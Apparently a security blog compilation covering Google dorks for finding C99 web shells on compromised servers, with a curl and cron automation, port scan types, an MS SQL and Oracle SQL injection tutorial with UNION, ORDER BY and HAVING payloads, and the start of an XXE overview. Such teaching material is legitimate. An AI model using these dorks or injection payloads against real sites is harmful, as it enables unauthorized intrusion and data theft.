This post is about identifying web back doors. I recently researched the C99 Shell PHP malware, which seems to be very popular among hacking groups and script kiddies.
C99 PHP Shell
C99Shell is a very well designed shell that lets you do practically anything on the server, provided you have the proper access rights. Here is a list of more web back doors. The link points to a Google project, so it will not be accessible through corporate web gateways (with malware filtering, URL filtering or content filtering).
Google Dorks
Nowadays someone does not even have to hack a web server. All they have to do is search Google for already compromised servers using Google Dorks, and they are into the compromised machine. The compromised machines found this way are usually not very interesting, because anything valuable is better protected (well, not always!) and the Google crawlers only pick up a back door a relatively long time after it was planted. This means that by the time you find a web back door through Google, many others have already found it before you.
To be more specific a "Crawler" is a generic term for any program (such as a robot or spider) used to automatically discover and scan websites by following links from one webpage to another. Google's main crawler is called Googlebot. This table lists information about the common Google crawlers you may see in your referrer logs, and how they should be specified in robots.txt, the robots meta tags, and the X-Robots-Tag HTTP directives.
But if you want more fine-grained control, you can get more specific. For example, you might want all your pages to appear in Google Search, but you don't want images in your personal directory, or hidden links such as a web back door, to be found and crawled. In this case, you can use robots.txt to disallow the user-agent Googlebot-Image from crawling the files in your /personal directory (while allowing Googlebot to crawl all files), like this:
User-agent: Googlebot
Disallow:
User-agent: Googlebot-Image
Disallow: /personal
Someone can improve his/her web site crawling performance by simply adding directives for different crawlers, like this:
The truth is that most of the time the web site is going to be crawled and easily found through Google no matter what you do, and an adversary will even be able to access pages that are not linked from anywhere.
Web Back-door Google-Dorks using Google Alerts
Gaining access to web back doors on already compromised machines is easier than you might think. By simply using Google Alerts you can search for web back doors across the Internet and be notified through your Google mailbox. The best way to do it is with the intitle:, intext: and inurl: search operators. For example, to search for !C99madShell you simply type one of the following in the search box:
intitle:!C99madShell
intext:!C99madShell
inurl:backdor_name.php
Note: If you want to limit the search to your own web site you can use the site: keyword. For example, typing intitle:!C99madShell site:www.maiavictim.com searches only your own web infrastructure. The following screenshots show how easy it is to automate web back door searching on a daily basis:
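The search strings above can also be assembled programmatically. The following is only a minimal sketch: the function name build_dork_url is hypothetical, and the base URL is simply the Google search address used later in this post.

```python
from typing import Optional
from urllib.parse import parse_qs, urlencode, urlsplit

# Assumption: the plain Google search endpoint used elsewhere in this post.
SEARCH_BASE = "http://www.google.com/search?"


def build_dork_url(operator: str, term: str, site: Optional[str] = None) -> str:
    """Build a search URL for one operator (intitle, intext, inurl)."""
    query = f"{operator}:{term}"
    if site:
        # Restrict the search to a single site with the site: keyword.
        query += f" site:{site}"
    # urlencode takes care of escaping ':' '!' and spaces.
    return SEARCH_BASE + urlencode({"q": query})


url = build_dork_url("intitle", "!C99madShell", site="www.maiavictim.com")
# Decode the query string again to confirm what would be searched.
print(parse_qs(urlsplit(url).query)["q"][0])
```

Decoding the URL again, as in the last line, is a cheap way to verify that the operator and the site restriction survived the encoding.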
The best way to avoid being hacked without finding out about it is to regularly check your web infrastructure using Google Alerts. This is also a very good first step before you begin a penetration test, to check for already compromised web infrastructure (I know I am brilliant).
Expand and automate the search using basic scripting
A good way to protect yourself from script kiddies is to similarly search for all the web back doors found in the link mentioned above (the Google project). A very good way to automate the whole process is with scripting!
First, go to Google and enter intitle:!C99madShell, and the search will return this:
If you copy the requested url you will see that it is exactly this one:
Now you can use curl to search using google dorks and save your search results in your hard disk or simply use firefox and save search results by doing a save as. You can do this with curl in your command prompt by typing:
curl -A Mozilla "http://www.google.com/search?q=C99madSHell" | html2text -width 10000000 | grep "Cached - Similar" | grep "www.*\.php"
The following screenshot shows the command (notice the html2text Linux utility I used):
The outcome of this command will be exactly the one shown below (after all the necessary grep-ing is done of course):
As you can see if you enlarge the picture, the output of the search and filtering performed with curl is redirected into a file (after being grepped to keep only the desired URLs). The output text file contains the potentially compromised web sites. Of course, manual filtering is still needed to remove URLs that are not really compromised.
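The same grep-style filtering can be sketched in Python for anyone who prefers to post-process the saved results in a script. This is an illustration only: the function name and the sample text are made up, and the pattern is deliberately as loose as the grep above.

```python
import re

# Loose pattern: "www." followed by non-space characters, ending in ".php".
PHP_URL = re.compile(r"www\.[^\s\"'<>]+?\.php\b")


def extract_php_urls(text):
    """Return unique .php URLs from result lines, in first-seen order."""
    urls = []
    for line in text.splitlines():
        # Mirror the first grep: keep only search-result lines.
        if "Cached - Similar" not in line:
            continue
        for match in PHP_URL.finditer(line):
            if match.group(0) not in urls:
                urls.append(match.group(0))
    return urls


# Hypothetical sample of html2text output.
SAMPLE = (
    "www.example.com/images/c99.php - Cached - Similar\n"
    "www.example.org/index.html - Cached - Similar\n"
    "some other line www.example.net/x.php\n"
)
print(extract_php_urls(SAMPLE))
```

The result still needs the manual review described above, since a matching URL is only a candidate.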
Crontabing Google Searches
The next step to completely automate the process is to use crontab; a good crontab tutorial is clickmojo. After reading this post you already understand how toxic the Internet has become.
Here is how to run a google dork search at 6PM every night:
Note: You can grep or sed the obtained data to analyze the results and verify that you logged only interesting URLs.
Epilog
Over the last 2 years the Internet has become more and more toxic. Even users with no significant information to expose, and online businesses, are starting to have a hard time maintaining their blogs or web sites without taking security seriously. Please feel free to post comments and give me feedback on how useful you find my posts.
WCE is the Windows Credentials Editor. It manipulates Windows logon sessions and is considered an evolution of the Pass-the-Hash Toolkit by its author, Hernan Ochoa. WCE Internals was presented at RootedCon in Madrid in early 2011. The presentation explains the inner workings of WCE, including how Windows stores credentials in memory before and after Windows Vista.
Post-Exploitation with WCE was presented in July 2011. It is a simple and effective high-level presentation with test cases.
This article is about basic types of port scanning.
Port States (taken from the Nmap man page)
open
An application is actively accepting TCP connections, UDP datagrams or SCTP associations on this port.
closed
A closed port is accessible (it receives and responds to Nmap probe packets), but there is no application listening on it. They can be helpful in showing that a host is up on an IP address (host discovery, or ping scanning), and as part of OS detection. Because closed ports are reachable, it may be worth scanning later in case some open up. Administrators may want to consider blocking such ports with a firewall. Then they would appear in the filtered state, discussed next.
filtered
Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. The filtering could be from a dedicated firewall device, router rules, or host-based firewall software. Sometimes they respond with ICMP error messages such as type 3 code 13 (destination unreachable: communication administratively prohibited), but filters that simply drop probes without responding are far more common.
unfiltered
The unfiltered state means that a port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, which is used to map firewall rulesets, classifies ports into this state. Scanning unfiltered ports with other scan types such as Window scan, SYN scan, or FIN scan, may help resolve whether the port is open.
open|filtered
Nmap places ports in this state when it is unable to determine whether a port is open or filtered. This occurs for scan types in which open ports give no response. The lack of response could also mean that a packet filter dropped the probe or any response it elicited. So Nmap does not know for sure whether the port is open or being filtered. The UDP, IP protocol, FIN, NULL, and Xmas scans classify ports this way.
closed|filtered
This state is used when Nmap is unable to determine whether a port is closed or filtered. It is only used for the IP ID idle scan.
TCP SYN scan (with Hping2)
Scanner --- SYN (Sequence Number Set to 1) ---> Target
Scanner <- SYN/ACK (Sequence Number Set 0 and Acknowledgment Set 0) - Target
Scanner --- RST (Sequence Number Set Again to 1) ---> Target (Only if host listens)
Note: Scanner Viciously Dropped The Connection.
Or
Scanner --- RST/ACK ---> Target (Not used by Hping2 connection termination pattern)
Note: Graciously Terminated connection? (both parties have to exchange an ACK flag), see below.
Only a SYN packet is sent to the target port. If a SYN/ACK is received from the target port, we can deduce that it is in the LISTENING state. If a RST/ACK is received, it usually indicates that the port is not listening, but we can deduce that the host is up. A RST/ACK or RST can be sent by the system performing the port scan so that a full connection is never established (also known as half open connections).
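The decision logic described above can be written down as a small function. This is a sketch of the interpretation step only, not a scanner: it sends nothing, the function name is hypothetical, and treating "no reply" as filtered follows the port state definitions quoted earlier.

```python
def classify_syn_response(flags):
    """Interpret the reply to a single SYN probe.

    flags is an iterable of TCP flag names from the reply,
    or None when no reply arrived at all.
    """
    if flags is None:
        # Nothing came back: a filter probably dropped the probe.
        return "filtered"
    flags = set(flags)
    if {"SYN", "ACK"} <= flags:
        # SYN/ACK means something is listening on the port.
        return "open"
    if "RST" in flags:
        # RST or RST/ACK: host is up, but nothing is listening.
        return "closed"
    return "unknown"


print(classify_syn_response(["SYN", "ACK"]))
print(classify_syn_response(["RST", "ACK"]))
print(classify_syn_response(None))
```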
Half Open Connections in SYN scans
A connection can be "half-open", in which case one side has terminated its end, but the other has not. The side that has terminated can no longer send any data into the connection, but the other side can. The terminating side should continue reading the data until the other side terminates as well (as specified in the RFCs). In SYN scanning the term is used more loosely, for a handshake that the scanner never completes.
Connection termination in port scanning?
The connection termination phase uses, at most, a four-way handshake, with each side of the connection terminating independently. When an endpoint wishes to stop its half of the connection, it transmits a FIN packet, which the other end acknowledges with an ACK. Therefore, a typical tear-down requires a pair of FIN and ACK segments from each TCP endpoint. After both FIN/ACK exchanges are concluded, the terminating side waits for a timeout before finally closing the connection, during which time the local port is unavailable for new connections; this prevents confusion due to delayed packets being delivered during subsequent connections. It is also possible to terminate the connection by a 3-way handshake, when host A sends a FIN and host B replies with a FIN & ACK (merely combines 2 steps into one) and host A replies with an ACK. This is perhaps the most common method.
TCP ACK scan (with Hping2)
Scanner --- ACK (Sequence Number Set 0 and Acknowledgment Set 0) ---> Target
Scanner <--- RST (Sequence Number Set Again to 1) --- Target
Or
Scanner <--- Connection Timeout or Sent ICMP Error --- Target
The ACK scan probe packet has only the ACK flag set (unless you use --scanflags with Nmap). When scanning unfiltered systems, open and closed ports will both return a RST packet. Nmap then labels them as unfiltered, meaning that they are reachable by the ACK packet, but whether they are open or closed is undetermined. Ports that don't respond, or send certain ICMP error messages back (type 3, code 1, 2, 3, 9, 10, or 13), are usually labeled filtered by Nmap.
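As a rough sketch, the ACK scan rules above map onto a few lines of code. The function and its arguments are hypothetical; it only interprets a reply that some other tool has already captured.

```python
# ICMP type 3 (destination unreachable) codes that indicate filtering,
# as listed in the paragraph above.
FILTERED_ICMP_CODES = {1, 2, 3, 9, 10, 13}


def classify_ack_response(got_rst, icmp=None):
    """Interpret the reply to a single ACK probe.

    got_rst: True if a RST came back.
    icmp:    (type, code) tuple of an ICMP error, or None.
    """
    if got_rst:
        # Open and closed ports both answer with RST.
        return "unfiltered"
    if icmp is None:
        # No reply at all.
        return "filtered"
    icmp_type, icmp_code = icmp
    if icmp_type == 3 and icmp_code in FILTERED_ICMP_CODES:
        return "filtered"
    return "unknown"


print(classify_ack_response(True))
print(classify_ack_response(False, icmp=(3, 13)))
```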
TCP Full Handshake or Connect scan (with Hping2)
Scanner --- SYN (Sequence Number Set to 0) ---> Target
Scanner <--- SYN/ACK (Sequence Number Set 0 and Acknowledgment Set 1) --- Target
Scanner --- ACK (Sequence Number Set 1 and Acknowledgment Set 1) ---> Target
Scanner --- FIN/ACK ---> Target
Scanner <--- ACK --- Target
Or
Scanner --- RST ---> Target (Nmap terminates the connection this way!)
Note: This type of scan might be logged by firewalls, depending on the firewall type and configuration.
UDP scan
When a UDP packet is sent to a port that is not open, the system will respond with an ICMP port unreachable message. Most UDP port scanners use this scanning method, and use the absence of a response to infer that a port is open. However, if a port is blocked by a firewall, this method will falsely report that the port is open.
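The false positive mentioned above is the reason Nmap reports silence as open|filtered rather than open. A minimal sketch of that interpretation follows; the function name and arguments are assumptions and nothing is sent on the wire.

```python
def classify_udp_response(got_udp_reply=False, icmp=None):
    """Interpret the reply to a single UDP probe.

    got_udp_reply: True if the service answered with a UDP datagram.
    icmp:          (type, code) tuple of an ICMP error, or None.
    """
    if got_udp_reply:
        return "open"
    if icmp == (3, 3):
        # ICMP port unreachable: nothing is listening.
        return "closed"
    if icmp is not None:
        # Any other ICMP error is treated here as a sign of filtering.
        return "filtered"
    # Silence cannot distinguish an open port from a dropped probe.
    return "open|filtered"


print(classify_udp_response(icmp=(3, 3)))
print(classify_udp_response())
```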
TCP NULL scan (with Hping2)
Scanner --- NULL ---> Target (All flags are set to 0)
Scanner <--- RST --- Target
Or
Scanner <--- Timeout Connection --- Target (Target host is filtered by a firewall that silently drops the connection)
TCP Null scan: This technique turns off all flags. Based on RFC 793, the target system should send back an RST for all closed ports.
TCP FIN scan (with Hping2)
Scanner --- FIN ---> Target
Scanner <--- RST --- Target
Or
Scanner <--- Timeout Connection --- Target (Target host is filtered by a firewall that silently drops the connection)
TCP FIN scan: This technique sends a FIN packet to the target port. Based on RFC 793 (http://www.ietf.org/rfc/rfc0793.txt), the target system should send back an RST for all closed ports. This technique usually only works, or used to work, on UNIX-based TCP/IP stacks.
TCP Xmas scan (with Hping2)
Scanner --- FIN,URG,PUSH ---> Target
Scanner <--- RST --- Target (For all closed ports, drop connection; works on UNIX boxes)
Or
Scanner <--- Timeout Connection --- Target (Target host is filtered and silently drops the connection)
TCP Xmas Tree scan: This technique sends a FIN, URG, and PUSH packet to the target port. Based on RFC 793, the target system should send back an RST for all closed ports.
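NULL, FIN and Xmas scans differ only in the flags of the probe and share the same interpretation, which a short sketch makes explicit. The names below are hypothetical, and the open|filtered result for silence follows the port state definitions quoted earlier.

```python
# Flags set on the probe for each of the three scan types.
PROBE_FLAGS = {
    "null": frozenset(),
    "fin": frozenset({"FIN"}),
    "xmas": frozenset({"FIN", "URG", "PSH"}),
}


def classify_stealth_response(got_rst):
    """Interpret the reply to a NULL, FIN or Xmas probe."""
    if got_rst:
        # RFC 793 behaviour: closed ports answer with RST.
        return "closed"
    # Open ports stay silent, and so do filters that drop the probe.
    return "open|filtered"


for scan, flags in PROBE_FLAGS.items():
    print(scan, sorted(flags))
print(classify_stealth_response(True))
print(classify_stealth_response(False))
```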
TCP Window scan (with Hping2)
Scanner --- ACK (Sequence Number Set 0 and Acknowledgment Set 0) ---> Target
Scanner <--- RST (Sequence Number Set Again to 1) --- Target
Or
Scanner <--- Connection Timeout or Sent ICMP Error --- Target
Window scan is exactly the same as ACK scan except that it exploits an implementation detail of certain systems to differentiate open ports from closed ones, rather than always printing unfiltered when a RST is returned. It does this by examining the TCP Window field of the RST packets returned. On some systems, open ports use a positive window size (even for RST packets) while closed ones have a zero window. So instead of always listing a port as unfiltered when it receives a RST back, Window scan lists the port as open or closed if the TCP Window value in that reset is positive or zero, respectively.
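In code, the only difference from the ACK scan is that the window value of the RST is inspected. A small sketch, with a hypothetical function name, that interprets an already captured reply:

```python
def classify_window_response(rst_window):
    """Interpret the reply to a Window scan probe.

    rst_window: TCP window size of the returned RST,
                or None when no RST came back.
    """
    if rst_window is None:
        return "filtered"
    if rst_window > 0:
        # Some stacks use a positive window on RSTs from open ports.
        return "open"
    return "closed"


print(classify_window_response(4096))
print(classify_window_response(0))
print(classify_window_response(None))
```

Since this relies on an implementation detail of certain systems, a result of closed for every port is more likely a sign that the target does not behave this way than a true answer.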
TCP Maimon scan
Scanner <--- Timeout Connection --- Target (Target host is filtered and silently drops the connection)
The Maimon scan is named after its discoverer, Uriel Maimon. He described the technique in Phrack Magazine issue #49 (November 1996). Nmap, which included this technique, was released two issues later. This technique is exactly the same as NULL, FIN, and Xmas scans, except that the probe is FIN/ACK. According to RFC 793 (TCP), a RST packet should be generated in response to such a probe whether the port is open or closed. However, Uriel noticed that many BSD-derived systems simply drop the packet if the port is open.
TCP Idle Scan (using Nmap)
Scanner --- SYN/ACK ---> Zombie
Scanner <--- RST with IP ID = 1 --- Zombie
Scanner --- Forged from zombie SYN ---> Target
Then when open port:
Target --- SYN/ACK ---> Zombie
Target <--- RST IP ID = 2 --- Zombie
Scanner --- SYN/ACK ---> Zombie
Scanner <--- RST IP ID = 3 --- Zombie
Or when closed or filtered port:
Target --- Timeout or RST ---> Zombie (With timeout or RST no ID is increased)
Scanner --- SYN/ACK ---> Zombie
Scanner <--- RST IP ID = 2 --- Zombie
Fundamentally, an idle scan consists of three steps that are repeated for each port:
1. Probe the zombie's IP ID and record it.
2. Forge a SYN packet from the zombie and send it to the desired port on the target. Depending on the port state, the target's reaction may or may not cause the zombie's IP ID to be incremented.
3. Probe the zombie's IP ID again. The target port state is then determined by comparing this new IP ID with the one recorded in step 1.
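The comparison in the last step comes down to simple arithmetic on the two recorded IP IDs. The sketch below assumes a zombie that increments its 16-bit IP ID by one per packet sent; the function name is hypothetical.

```python
def classify_idle_scan(ipid_before, ipid_after):
    """Compare the zombie's IP ID before and after the forged SYN."""
    # The IP ID field is 16 bits wide, so it wraps around at 65536.
    delta = (ipid_after - ipid_before) % 65536
    if delta == 2:
        # One RST to the target's SYN/ACK plus one reply to our probe.
        return "open"
    if delta == 1:
        # Only the reply to our second probe was sent.
        return "closed|filtered"
    # The zombie is sending other traffic; the result is not reliable.
    return "inconclusive"


print(classify_idle_scan(1, 3))
print(classify_idle_scan(1, 2))
print(classify_idle_scan(65535, 1))
```

The first two calls correspond to the open and closed/filtered diagrams above (IP ID 1 to 3, and 1 to 2).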
This article was written for the completeness of this blog as far as Web Application Security is concerned, and it focuses mainly on MS SQL injection.
What is SQL?
SQL was originally developed at IBM in the early 1970s but was not officially formalized until 1986 by the American National Standards Institute (ANSI). SQL was initially designed as a data query and manipulation language with limited functionality when compared to today’s feature-rich SQL dialects.
SQL Microsoft SQL Server
Transact-SQL (T-SQL) is Microsoft's and Sybase's proprietary extension to SQL. SQL, often expanded to Structured Query Language, is a standardized computer language that was originally developed by IBM for querying, altering and defining relational databases, using declarative statements. T-SQL expands on the SQL standard to include procedural programming, local variables, various support functions for string processing, date processing, mathematics, etc. and changes to the DELETE and UPDATE statements. These additional features make Transact-SQL Turing complete.
Transact-SQL is central to using Microsoft SQL Server. All applications that communicate with an instance of SQL Server do so by sending Transact-SQL statements to the server, regardless of the user interface of the application.
What is SQL injection?
SQL injection is a technique to maliciously exploit applications that use client-supplied data in SQL statements. Attackers trick the SQL engine into executing unintended commands by supplying specially crafted string input, thereby gaining unauthorized access to a database in order to view or manipulate restricted data.
Where to look for SQL Injection
Practically and realistically speaking, you should look for SQL injection in every variable used by a web application. SQL injection is an attack in which SQL code is inserted or appended into application user input parameters (the web application might also populate variables automatically that feed the back-end database) that are later passed to a back-end SQL server for parsing and execution. Any procedure that constructs SQL statements could potentially be vulnerable, as the diverse nature of SQL and the methods available for constructing it provide a wealth of coding options.
The primary form of SQL injection consists of direct insertion of code into parameters that are concatenated with SQL commands and executed. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command, the malicious code is executed.
Why SQL Injection Happens
When a Web application fails to properly sanitize the parameters which are passed to dynamically created SQL statements it is possible for an attacker to alter the construction of back-end SQL statements. When an attacker is able to modify an SQL statement, the statement will execute with the same rights as the application user.
SQL injection usually happens for two reasons:
Dynamically generated SQL queries built with string concatenation operators.
Unsanitized input to these SQL queries.
Note: When using the SQL server to execute commands that interact with the operating system, the process will run with the same permissions as the component that executed the command.
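To make the two reasons concrete, here is a minimal sketch that contrasts a concatenated query with a parameterized one. It uses Python's built-in sqlite3 module and an in-memory SQLite database instead of MS SQL Server, purely so that it runs anywhere; the table, the data and the function names are made up for illustration.

```python
import sqlite3


def make_db():
    """Create a throwaway in-memory database with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "a-secret"), ("bob", "b-secret")],
    )
    return conn


def lookup_concatenated(conn, name):
    # Vulnerable: user input becomes part of the SQL text.
    query = "SELECT secret FROM users WHERE name = '" + name + "'"
    return sorted(row[0] for row in conn.execute(query))


def lookup_parameterized(conn, name):
    # Safe: the input is passed as data, never parsed as SQL.
    query = "SELECT secret FROM users WHERE name = ?"
    return sorted(row[0] for row in conn.execute(query, (name,)))


conn = make_db()
payload = "' OR '1'='1"
print(lookup_concatenated(conn, payload))   # every secret leaks
print(lookup_parameterized(conn, payload))  # no user has that name
```

With the payload, the concatenated query becomes WHERE name = '' OR '1'='1', which is true for every row, while the parameterized version simply looks for a user with that odd name.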
Types of SQL Injections
According to my experience there are three types of SQL injections:
Error Based SQL injections (no input validation or output database error filtering).
Semi Blind/Error Based SQL injections (minor or no input validation but output database error filtering).
Blind SQL injections (strict both input and output filtering).
How you identify Error Based SQL Injections
You can identify an SQL injection by injecting the following five characters: ' , " , ) , ; , -- and combinations of them, e.g. );-- or '); -- etc. If you inject one of these characters into a vulnerable variable and the web application does not filter database errors, the resulting SQL error will reveal more information about the back-end database.
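Typing the combinations by hand gets tedious, so a short generator can help. This is just one possible sketch: the function name is hypothetical, and the default limit of three tokens per probe is an arbitrary choice to keep the list short.

```python
from itertools import permutations

# The five probe tokens listed above.
PROBE_TOKENS = ["'", '"', ")", ";", "--"]


def probe_strings(max_tokens=3):
    """Return every ordered combination of up to max_tokens tokens."""
    probes = []
    for length in range(1, max_tokens + 1):
        for combo in permutations(PROBE_TOKENS, length):
            probes.append("".join(combo))
    return probes


probes = probe_strings()
print(len(probes))
print(");--" in probes)
```

Each string would then be submitted in the suspected variable, one at a time, while watching the response for database errors.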
Identify Number of Columns using the NULL data type
After successfully identifying a vulnerable variable, the next step is to understand the structure of the SELECT query. The structure is revealed through the verbose SQL errors. To find the number of columns we use NULL, because NULL can be cast to the data type of any column in the abused SELECT query. By progressively increasing the number of NULLs, the injected query will eventually execute as a valid query (no database error will be returned).
MSSQL:
' UNION SELECT NULL--
MSSQL:
' UNION SELECT NULL,NULL--
MSSQL:
' UNION SELECT NULL,NULL,NULL--
Poof -- no error comes back from SQL, the query was executed.
Note: You might also have to play with the comment characters at the end of the injected query sometimes.
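The loop of adding one NULL at a time is easy to simulate locally. The sketch below runs against an in-memory SQLite database rather than MS SQL Server (an assumption made only so that the example is runnable), and base_query stands in for the application's original SELECT; all names are hypothetical.

```python
import sqlite3


def count_columns_with_union(conn, base_query, max_columns=10):
    """Add NULLs to a UNION SELECT until the query stops failing."""
    for n in range(1, max_columns + 1):
        nulls = ", ".join(["NULL"] * n)
        try:
            conn.execute(f"{base_query} UNION SELECT {nulls}").fetchall()
        except sqlite3.OperationalError:
            # Column count mismatch: try again with one more NULL.
            continue
        return n
    return None


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
print(count_columns_with_union(conn, "SELECT id, name, price FROM products"))
```

Against a real target the error would show up in the HTTP response instead of as a Python exception, but the counting logic is the same.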
Identify number of Columns using ORDER BY Clause (Transact-SQL)
To identify the number of columns we can also use the ORDER BY clause (Transact-SQL) in MSSQL. The ORDER BY clause specifies the sort order used on columns returned in a SELECT statement. The ORDER BY clause is not valid in views, inline functions, derived tables, and subqueries. The ORDER BY clause does not guarantee ordered results when these constructs are queried, unless ORDER BY is also specified in the query itself.
Syntax:
[ ORDER BY
{
order_by_expression
[ COLLATE collation_name ]
[ ASC | DESC ]
} [ ,...n ]
]
Specifies a column on which to sort. A sort column can be specified as a name or column alias, or a nonnegative integer representing the position of the name or alias in the select list. An integer cannot be specified when the order_by_expression appears in a ranking function. A sort column can include an expression, but when the database is in SQL Server (90) compatibility mode, the expression cannot resolve to a constant. Column names and aliases can be qualified by the table or view name.
In SQL Server, qualified column names and aliases are resolved to columns listed in the FROM clause. If order_by_expression is not qualified, the value must be unique among all columns listed in the SELECT statement.Multiple sort columns can be specified. The sequence of the sort columns in the ORDER BY clause defines the organization of the sorted result set.
The ORDER BY clause can include items that do not appear in the select list. However, if SELECT DISTINCT is specified, or if the statement contains a GROUP BY clause, or if the SELECT statement contains a UNION operator, the sort columns must appear in the select list. Additionally, when the SELECT statement includes a UNION operator, the column names or column aliases must be those specified in the first select list.
COLLATE {collation_name}
Specifies that the ORDER BY operation should be performed according to the collation specified in collation_name, and not according to the collation of the column as defined in the table or view. collation_name can be either a Windows collation name or a SQL collation name. For more information, see Collation Settings in Setup and Using SQL Server Collations. COLLATE is applicable only for columns of the char, varchar, nchar, and nvarchar data types.
ASC
Specifies that the values in the specified column should be sorted in ascending order, from lowest value to highest value. ASC is the default sort.
DESC
Specifies that the values in the specified column should be sorted in descending order, from highest value to lowest value.
Note1: ntext, text, image, or xml columns cannot be used in an ORDER BY clause.
Note2: Null values are treated as the lowest possible values.
Note3: There is no limit to the number of items in the ORDER BY clause. However, there is a limit of 8,060 bytes for the row size of intermediate worktables needed for sort operations. This limits the total size of columns specified in an ORDER BY clause.
Note4: When used together with a SELECT...INTO statement to insert rows from another source, the ORDER BY clause does not guarantee the rows are inserted in the specified order.
Extended malicious SELECT query using ORDER BY:
MSSQL:
' ORDER BY 1 --
MSSQL:
' ORDER BY 2 --
MSSQL:
' ORDER BY 3 --
We do that until an error occurs; the last value that did not produce an error is the number of columns.
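The ORDER BY variant can be simulated the same way. As before, this sketch uses an in-memory SQLite database in place of MS SQL Server, and the table and function names are hypothetical; SQLite also rejects an ORDER BY position beyond the select list, which is the behaviour the technique relies on.

```python
import sqlite3


def count_columns_with_order_by(conn, base_query, max_columns=10):
    """Increase the ORDER BY position until the database complains."""
    for n in range(1, max_columns + 1):
        try:
            conn.execute(f"{base_query} ORDER BY {n}").fetchall()
        except sqlite3.OperationalError:
            # Position n is out of range, so there are n - 1 columns.
            return n - 1
    return None


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
print(count_columns_with_order_by(conn, "SELECT id, name, price FROM products"))
```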
Identify Type of Columns using version variable
A similar technique can be used with the version system variable:
MSSQL:
' UNION SELECT @@version,NULL,NULL--
ORACLE:
' UNION SELECT banner,NULL,NULL FROM v$version--
Note that Oracle does not support the @@version variable. When targeting an Oracle database, the attack is identical in every other way, but you would use the v$version query shown above instead. When multiple columns are returned from a target table, they can be concatenated into a single column. This makes retrieval more straightforward, because it requires identification of only a single varchar field in the original query:
Identify Name of Columns using HAVING (Transact-SQL)
HAVING (Transact-SQL) specifies a search condition for a group or an aggregate. HAVING can be used only with the SELECT statement. HAVING is typically used with a GROUP BY clause. When GROUP BY is not used, HAVING behaves like a WHERE clause.
Syntax:
[ HAVING <search condition> ]
Arguments
search_condition
Specifies the search condition for the group or the aggregate to meet. The text, image, and ntext data types cannot be used in a HAVING clause.
Malicious queries using HAVING to identify columns:
MSSQL:
' HAVING 1=1--
MSSQL:
' GROUP BY table.column_name1 HAVING 1=1 --
MSSQL:
' GROUP BY table.column_name1, table.column_name2 HAVING 1=1 --
Note: Once all column names have been successfully enumerated, no error should be returned (meaning that the query succeeds).
Identify Data Type of Columns using different data types
The next step is to identify the type of the data in each column. Let's say that, based on our experience, the query is likely to contain string type columns. So we "scan" each column with the char 'a':
MSSQL:
' UNION SELECT 'a', NULL, NULL--
MSSQL:
' UNION SELECT NULL, 'a', NULL--
MSSQL:
' UNION SELECT NULL, NULL, 'a' --
Poof -- no casting error comes back from SQL.
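Once the number of columns is known, the per-column probes can be generated instead of typed. A minimal sketch, with a hypothetical function name; the leading quote and the trailing comment are taken from the payloads above and may need adjusting per target.

```python
def type_probe_payloads(column_count, probe="'a'", suffix="--"):
    """Build one payload per column, with the probe in that column."""
    payloads = []
    for position in range(column_count):
        columns = ["NULL"] * column_count
        # Put the typed probe value in exactly one column.
        columns[position] = probe
        payloads.append("' UNION SELECT " + ", ".join(columns) + suffix)
    return payloads


for payload in type_probe_payloads(3):
    print(payload)
```

Passing probe="1" instead of the default would test for numeric columns in the same way.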
Note: In Oracle databases, every SELECT statement must include a FROM clause, so injecting UNION SELECT NULL produces an error regardless of the number of columns. You can satisfy this requirement by selecting from the globally accessible table DUAL. For example, in Oracle you can inject:
ORACLE:
' UNION SELECT NULL FROM DUAL--
ORACLE:
' UNION SELECT NULL,NULL,'a' FROM DUAL--
ORACLE:
' UNION SELECT NULL,'a',NULL FROM DUAL--
Poof -- no casting error comes back from SQL.
Identify Data Type of Columns using SUM (Transact-SQL)
SUM (Transact-SQL) returns the sum of all the values, or only the DISTINCT values, in the expression. SUM can be used with numeric columns only. Null values are ignored. May be followed by the OVER Clause (Transact-SQL).
MSSQL:
' UNION SELECT SUM(column_name1) FROM table --
MSSQL:
' UNION SELECT SUM(column_name2) FROM table --
MSSQL:
' UNION SELECT SUM(column_name3) FROM table --
Poof -- no casting error comes back from SQL.
Note: The UNION operator attempts to perform a second query and combine the results with those of the original.
XML External Entity (XXE) Injection — Updated 2026
DTD Abuse // File Disclosure // Blind OOB Exfiltration // SSRF via XML
Tags: XXE, CWE-611, A5:2021, SSRF, Blind OOB, Updated 2026
Intro
External entity injection is generally speaking a type of XML injection that allows an attacker to force a badly configured XML parser to "include" or "load" unwanted functionality that compromises the security of a web application. This type of attack is well documented and known since 2002, though it continues to appear in modern applications — particularly in SOAP services, file upload handlers, and legacy enterprise integrations.
Taxonomy (2026): XXE was categorized as OWASP A4:2017 — XXE (its own dedicated category). In OWASP Top 10 2021, it was merged into A5:2021 — Security Misconfiguration. The primary CWE is CWE-611 (Improper Restriction of XML External Entity Reference). Also relevant: CWE-827 (Improper Control of Document Type Definition).
XML external entity injection vulnerabilities arise because the XML specification allows XML documents to define entities which reference resources external to the document. XML parsers typically support this feature by default, even though it is rarely required by applications during normal usage.
An XXE attack is usually an attack on an application that parses XML input from untrusted sources using an incorrectly configured XML parser. The application may be coerced to open arbitrary files and/or TCP connections — allowing embedding of data outside the main file into an XML document. A successful XXE injection attack could allow an attacker to access operating system files, cause a DoS attack, perform SSRF, or in certain conditions inject JavaScript (performing an XSS attack).
When an XML processor recognizes a reference to a parsed entity, in order to validate the document, the processor MUST include its replacement text. If the entity is external, and the processor is not attempting to validate the XML document, the processor MAY, but need not, include the entity's replacement text. If a non-validating processor does not include the replacement text, it MUST inform the application that it recognized, but did not read, the entity.
This rule is based on the recognition that the automatic inclusion provided by the SGML and XML entity mechanism, primarily designed to support modularity in authoring, is not necessarily appropriate for other applications, in particular document browsing. Browsers, for example, when encountering an external parsed entity reference, might choose to provide a visual indication of the entity's presence and retrieve it for display only on demand.
